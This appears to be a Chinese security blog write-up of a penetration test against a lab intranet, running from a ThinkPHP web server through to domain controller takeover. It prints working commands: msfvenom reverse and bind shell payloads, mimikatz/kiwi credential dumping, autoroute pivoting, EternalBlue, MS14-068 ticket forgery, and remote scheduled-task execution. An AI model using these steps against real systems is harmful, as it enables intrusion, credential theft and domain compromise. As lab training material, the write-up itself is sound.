freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

记一次内网靶场渗透测试
星云博创 2022-09-29 10:03:57 269704
所属地 广东省

mLPrOgnQ_rCqn.gif

程序员写在文章前:

最近,程序员小星在研究内网渗透,对部分内网靶场进行了测试,所以想和大家从测试过程、检测过程以及域渗透过程这3个方面来分享一下我在打内网靶场中的经历。

准备工作

本次内网网络拓扑图如下所示,首先将WEB的IP 192.168.0.150改为192.168.0.3。image.png

(一)测试过程

信息收集:

1. 对目标IP进行端口扫描。
sudo nmap -sS --open -Pn -p- -v 192.168.0.3

image.png

2.绑定hosts 192.168.0.3 www.webhack123.com ,访问网站首页出现一个thinkphp框架。

image.png

3.对网站进行目录扫描。

image.png

4.存在wc.db将其下载下来,使用工具打开,里面存在网站目录文件信息,查看网站目录信息后,可以了解网站的基本架构。

image.png

(二)检测过程

1. 通过前面的信息搜集,已经知道当前网站是thinkphp框架了,使用工具扫描一下常见的漏洞,发现存在日志泄漏。image.png

2.在日志中泄漏了账号和密码的密文。

账号:admin

密文:74c774ef39b5b977c1fd59dbfc73c3e380a65aa3

image.png

3.通过解密获取密码明文web123。image.png

4.前面对网站进行目录扫描,未发现网站管理后台,因此使用脚本来绑定 hosts 碰撞管理后台的子域名。

image.png

5. admin.webhack123.com就是网站的管理后台。

image.png

6.使用前面获取的管理员账号密码进行登录,可以测试发现验证码是存在缺陷,也可以使用大字典来爆破出管理员的密码。

image.png

7.进入网站后台,修改允许上传的类型,上传一句话木马。

image.png

8.使用蚁剑连接获取webshell。

image.png

9. 在当前主机先进行简单的信息搜集,当前用户为administrator且主机未安装杀软,存在双网卡192.168.0.0/24 10.10.10.0/24,存在域环境。

生成攻击载荷先上线msf:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=9999  -f exe>haha.exe

image.png

10.迁移进程获取明文密码。

migrate 600

load kiwi

creds_all

image.png

11.获取登录过当前主机的用户信息。

run post/windows/gather/enum_logged_on_users

image.png

12. 可以看到存在hackbox域的域用户web,本地管理员Administrator的密码为:!@#Qwe456

前面我们已经知道存在域环境,现在定位到域控为:dc.hackbox.com 10.10.10.149。

image.png

(三)域渗透过程

1. 前面知道该主机存在两个网卡,现在来对这两个网段的存活主机进行扫描,首先添加:

run autoroute -s 10.10.10.0/24

run autoroute -p

image.png

2. 对内网存活主机进行扫描,只存在10.10.10.149,也就是域控,且开放了445端口。

image.png

3.使用永恒之蓝试打,检测出存在永恒之蓝漏洞。

image.png

4. 反向shell失败原因未明,正向的shell是可以成功返回一个meterpreter,成功获取域控dc权限。
image.png

5. 测试使用MS14-068漏洞:使用这个 exp 需要一个普通域控用户, web 是域用户,但不知道密码。前面获取到用户Administrator的密码为!@#Qwe456,现尝试使用用户web和这个密码进行登录。

image.png

6.登录失败,但是密码应该是正确的,只是不是远程组。

image.png

7. #创建票据

ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

Load kiwi

#清理票据

kerberos_ticket_purge

image.png

8.上传 mimikatz 注入票据 mimikatz # kerberos::ptc TGT_web@hackbox.com.ccache。

image.png

9.查看票据 klist。

image.png

10.成功访问dc域控。

image.png

11.现在来获取域控权限,生成一个正向的载荷:

msfvenom -p windows/meterpreter/bind_tcp  LPORT=9998  -f exe>bind.exe

copy命令复制到域控copy bind.exe \\dc\c$。

image.png
12. at命令执行计划任务运行bind.exe

net time \\dc

at \\dc 1:29:00 c:/bind.ex

image.png

13.成功获取域控权限。
image.png

14.迁移进程抓取明文密码。
image.png

15.至此已经拿下了域控的权限。

image.png

16.迁移到域管理员进程查看三个flag。

image.png

(四)总结

小星通过此次内网靶场测试的研究,加深了对内网系统的认识,熟练掌握了如何使用MSF完成整个打靶过程。下期,小星将使用Cobalstrick来完成打靶并以“黄金票据的利用”为题开展研究。

# 渗透测试 # 网络安全 # 内网渗透 # 漏洞分析 # 网络安全技术
本文为 星云博创 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
星云博创 LV.7
星云博创科技有限公司
  • 96 文章数
  • 76 关注者
【技术分享】记某项目漏洞挖掘
2024-01-16
【技术分享】短信验证码的相关利用方法与技巧
2023-11-23
【技术分享】业务逻辑漏洞案例剖析
2023-10-18
文章目录